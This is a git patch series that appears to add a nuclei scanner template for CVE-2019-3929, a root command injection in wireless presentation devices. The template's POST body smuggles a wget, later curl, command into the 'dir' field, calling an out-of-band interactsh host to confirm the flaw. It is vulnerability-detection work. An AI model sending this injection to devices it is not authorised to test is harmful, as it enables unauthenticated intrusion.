From 626b97e368b12616d65506f11aab2a9353ee4f22 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 5 Nov 2021 20:58:18 +0530 Subject: [PATCH 1/3] Create CVE-2019-3929.yaml --- cves/2019/CVE-2019-3929.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2019/CVE-2019-3929.yaml diff --git a/cves/2019/CVE-2019-3929.yaml b/cves/2019/CVE-2019-3929.yaml new file mode 100644 index 0000000000..e46a5f1bcc --- /dev/null +++ b/cves/2019/CVE-2019-3929.yaml @@ -0,0 +1,28 @@ +id: CVE-2019-3929 + +info: + name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929) + author: _0xf4n9x_ + severity: high + description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. + reference: + - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html + - https://www.exploit-db.com/exploits/46786/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-3929 + tags: rce,cve,cve2019,oob + +requests: + - method: POST + path: + - "{{BaseURL}}/cgi-bin/file_transfer.cgi" + + body: "file_transfer=new&dir=%27Pa_Noteexpr%20wget+http://{{interactsh-url}}Pa_Note%27" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 3c7d23941582f4ba5813a8c18f567c1d14d93735 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 5 Nov 2021 20:59:47 +0530 Subject: [PATCH 2/3] Update CVE-2019-3929.yaml --- cves/2019/CVE-2019-3929.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-3929.yaml b/cves/2019/CVE-2019-3929.yaml index e46a5f1bcc..f3cafdeeae 100644 --- a/cves/2019/CVE-2019-3929.yaml +++ b/cves/2019/CVE-2019-3929.yaml @@ -16,7 +16,7 @@ requests: path: - "{{BaseURL}}/cgi-bin/file_transfer.cgi" - body: "file_transfer=new&dir=%27Pa_Noteexpr%20wget+http://{{interactsh-url}}Pa_Note%27" + body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27" headers: Content-Type: application/x-www-form-urlencoded From eef71d5cb8c9758a0d6395da02e978cdcbdc5449 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 5 Nov 2021 21:07:40 +0530 Subject: [PATCH 3/3] Update CVE-2019-3929.yaml --- cves/2019/CVE-2019-3929.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-3929.yaml b/cves/2019/CVE-2019-3929.yaml index f3cafdeeae..9312091e78 100644 --- a/cves/2019/CVE-2019-3929.yaml +++ b/cves/2019/CVE-2019-3929.yaml @@ -9,7 +9,7 @@ info: - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html - https://www.exploit-db.com/exploits/46786/ - https://nvd.nist.gov/vuln/detail/CVE-2019-3929 - tags: rce,cve,cve2019,oob + tags: rce,cve,cve2019,oast requests: - method: POST